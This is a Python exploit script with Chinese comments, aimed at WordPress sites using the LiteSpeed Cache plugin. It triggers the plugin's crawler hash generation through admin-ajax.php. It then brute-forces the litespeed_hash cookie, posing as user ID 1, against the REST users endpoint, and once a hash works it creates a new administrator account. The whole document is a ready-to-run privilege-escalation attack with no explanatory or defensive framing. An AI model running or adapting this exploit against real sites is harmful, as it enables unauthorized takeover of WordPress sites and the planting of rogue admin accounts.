1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114

import requests
import random
import string
import concurrent.futures

# 配置
target_url = 'http://example.com'
rest_api_endpoint = '/wp-json/wp/v2/users'
ajax_endpoint = '/wp-admin/admin-ajax.php'
admin_user_id = '1'
num_hash_attempts = 1000000
num_workers = 10
new_username = 'newadminuser' # 替换为所需的用户名
new_user_password = 'NewAdminPassword123!' # 替换为安全密码

def mt_srand(seed=None):
    """
    通过设置随机数生成种子来模拟PHP的mt_srand函数。
    """
    random.seed(seed)

def mt_rand(min_value=0, max_value=2**32 - 1):
    """
    通过生成指定范围内的随机数来模拟PHP的mt_rand函数。
    """
    return random.randint(min_value, max_value)

def generate_random_string(length=6):
    """
    基于mt_rand的输出生成随机字符串。
    """
    chars = string.ascii_letters + string.digits
    return ''.join(random.choices(chars, k=length))

def trigger_hash_generation():
    payload = {
        'action': 'async_litespeed',
        'litespeed_type': 'crawler'
    }
    try:
        response = requests.post(f'{target_url}{ajax_endpoint}',
data=payload)
        if response.status_code == 200:
            print('[INFO] 已触发哈希生成。')
        else:
            print(f'[ERROR] 触发哈希生成失败 - 状态码: {response.status_code}')
    except requests.RequestException as e:
        print(f'[ERROR] AJAX请求失败: {e}')

def attempt_hash(hash_value):
    cookies = {
        'litespeed_hash': hash_value,
        'litespeed_role': admin_user_id
    }
    try:
        response = requests.post(f'{target_url}{rest_api_endpoint}',
cookies=cookies)
        return response, cookies
    except requests.RequestException as e:
        print(f'[ERROR] 请求失败: {e}')
        return None, None

def create_admin_user(cookies):
    user_data = {
        'username': new_username,
        'password': new_user_password,
        'email': f'{new_username}@example.com',
        'roles': ['administrator']
    }
    try:
        response = requests.post(f'{target_url}{rest_api_endpoint}',
cookies=cookies, json=user_data)
        if response.status_code == 201:
            print(f'[SUCCESS] 新管理员用户"{new_username}"创建成功！')
        else:
            print(f'[ERROR] 创建管理员用户失败 - 状态码: {response.status_code} - 响应: {response.text}')
    except requests.RequestException as e:
        print(f'[ERROR] 用户创建请求失败: {e}')

def worker():
    for _ in range(num_hash_attempts // num_workers):
        random_string = generate_random_string()
        print(f'[DEBUG] 尝试哈希: {random_string}')

        response, cookies = attempt_hash(random_string)

        if response is None:
            continue

        print(f'[DEBUG] 响应状态码: {response.status_code}')
        print(f'[DEBUG] 响应内容: {response.text}')

        if response.status_code == 201:
            print(f'[SUCCESS] 找到有效哈希: {random_string}')
            create_admin_user(cookies)
            return
        elif response.status_code == 401:
            print(f'[FAIL] 无效哈希: {random_string}')
        else:
            print(f'[ERROR] 哈希的意外响应: {random_string} - 状态码: {response.status_code}')

def main():
    # 播种随机数生成器（模拟mt_srand）
    mt_srand()

    trigger_hash_generation()

    with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as
executor:
        futures = [executor.submit(worker) for _ in range(num_workers)]
        concurrent.futures.wait(futures)

if __name__ == '__main__':
    main()